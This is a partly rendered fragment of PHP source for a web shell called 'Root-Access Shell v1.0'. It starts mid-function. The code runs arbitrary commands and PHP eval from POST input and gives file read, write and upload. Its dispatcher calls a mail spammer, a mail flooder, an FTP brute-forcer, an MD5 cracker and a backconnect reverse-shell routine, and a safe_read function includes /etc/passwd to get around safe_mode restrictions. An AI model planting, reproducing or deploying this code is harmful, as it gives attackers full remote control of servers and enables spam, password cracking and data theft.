Root-Access Shell

ON"; }else{ return "OFF"; } } function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } function testfetch() { if(ex('fetch --help')) { return "ON"; }else{ return "OFF"; } } function testwget() { if(ex('wget --help')) { return "ON"; }else{ return "OFF"; } } function oracle() { if(function_exists('ocilogon')) { return "ON"; }else{ return "OFF"; } } function postgresql() { if(function_exists('pg_connect')) { return "ON"; }else{ return "OFF"; } } function testmssql() { if(function_exists('mssql_connect')) { return "ON"; }else{ return "OFF"; } } function testcurl() { if(function_exists('curl_version')) { return "ON"; }else{ return "OFF"; } } function testmysql() { if(function_exists('mysql_connect')) { return "ON"; }else{ return "OFF"; } } function safe_mode() { if(!$safe_mode && strpos(ex("echo abch0ld"),"h0ld")!=3) { $_SESSION['safe_mode'] = 1; return "ON"; }else{ $_SESSION['safe_mode'] = 0; return "OFF"; } }; function ex($in) { $out = ''; if(function_exists('exec')) { exec($in,$out); $out = join("\n",$out); } elseif(function_exists('passthru')) { ob_start(); passthru($in); $out = ob_get_contents(); ob_end_clean(); } elseif(function_exists('system')) { ob_start(); system($in); $out = ob_get_contents(); ob_end_clean(); } elseif(function_exists('shell_exec')) { $out = shell_exec($in); } elseif(is_resource($f = popen($in,"r"))) { $out = ""; while(!@feof($f)) { $out .= fread($f,1024); } pclose($f); } return $out; } function shell() { if($_POST['type']==1) { eval(stripslashes($_POST['value'])); } elseif($_POST['type']==2) { pwd(); print_r(ex(stripslashes($_POST['value']))); } elseif($_POST['type']==3) { if($_SESSION['safe_mode'] == 1){ if(($u=safe_ex('ls -la'))!='') {return $u;}else{return safe_ex('dir');}; }else{ if(($u=ex('ls -la'))!='') {return $u;}else{return ex('dir');}; } } elseif($_POST['type']==4) { if(file_exists(stripslashes($_POST['value']))) { if($safe_mode!=1){ echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']),"rw"),filesize(stripslashes($_POST['value'])))); }else{ echo htmlspecialchars(safe_read(stripslashes($_POST['value']))); }; $_SESSION['edit']=1; $_SESSION['filename'] = $_POST['value']; }else{ return 'File doesn\'t exists!'; } } elseif($_POST['type']==5) { fputs(fopen($_SESSION['filename'],"w"),stripslashes($_POST['value'])); } elseif($_POST['type']==6) { $uploaddir = pwd(); if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];}; move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name); } elseif($_POST['type']==7) { echo alias($_POST['value']); } elseif($_POST['type']==8) { echo spammer(stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['check']),stripslashes($_POST['elist']),stripslashes($_POST['logf'])); } elseif($_POST['type']==9) { echo ftp_brute(stripslashes($_POST['host']),stripslashes($_POST['users']),stripslashes($_POST['passwd']),stripslashes($_POST['log'])); } elseif($_POST['type']==10) { echo flooder(stripslashes($_POST['log']),stripslashes($_POST['to']),stripslashes($_POST['from']),stripslashes($_POST['subject']),stripslashes($_POST['msg']),stripslashes($_POST['amount']),stripslashes($_POST['check'])); } elseif($_POST['type']==12) { echo backconnect(stripslashes($_POST['ip']),stripslashes($_POST['port']),stripslashes($_POST['method'])); } elseif($_POST['type']==13) { echo backconnect(stripslashes($_POST['port']),stripslashes($_POST['pass']),stripslashes($_POST['method'])); } elseif($_POST['type']==14) { echo md5_brute(stripslashes($_POST['hash']),stripslashes($_POST['log']),stripslashes($_POST['dict'])); } else {$u = ex('ls -la'); if($u == ''){return ex('dir');}else{return $u;}; } return null; }; function edit() { if ($_SESSION['edit'] == 1){ $_SESSION['edit']=0; return "
";}; } function getsystem() { return php_uname('s')." ".php_uname('r')." ".php_uname('v'); }; function getserver() { return getenv("SERVER_SOFTWARE"); }; function getuser() { $out = get_current_user(); if($out!="SYSTEM") { if(($out=ex('id'))==''){$out = "uid=".getmyuid()."(".get_current_user().") gid=".getmygid();}; } return $out; }; function pwd() { if($_POST['type']==3) { $_SESSION['pwd'] = stripslashes($_POST['value']); } chdir($_SESSION['pwd']); $cwd = getcwd(); if($u=strrpos($cwd,'/')) { if($u!=strlen($cwd)-1){ return $cwd.'/';} else{return $cwd;}; } elseif($u=strrpos($cwd,'\\')) { if($u!=strlen($cwd)-1){ return $cwd.'\\';} else{return $cwd;}; }; } function safe_ex($in) { if($in){ $d=dir('.'); while (false!==($file=$d->read())) { if ($file=="." || $file=="..") continue; @clearstatcache(); list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); if(!$unix){ echo date("d.m.Y H:i",$mtime)." "; if(@is_dir($file)) echo " "; else printf("% 7s ",$size); } else{ $owner = @posix_getpwuid($uid); $grgid = @posix_getgrgid($gid); echo $inode." "; echo perms(@fileperms($file)); printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); echo date("d.m.Y H:i ",$mtime); } echo "$file\n"; } $d->close(); } function safe_read($in) { echo ini_get("safe_mode"); echo ini_get("open_basedir"); include("/etc/passwd"); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); file_get_contents($in); } } ?> Root-Access Shell

Server Info

System:	PHP-version:	Oracle:	Safe_mode:
Server:	MySQL:	cURL:	Total space:
PWD: 45){echo "...".substr($u,strlen($u)-40,40);}else{echo $u;};?>	PostgreSQL:	WGet:	Free space:
User:	MSSQL:	Perl:	Server time:

Shell

Tools
Edit file: > Download: > Upload: New name:

Copyright
Root-Access Shell v1.0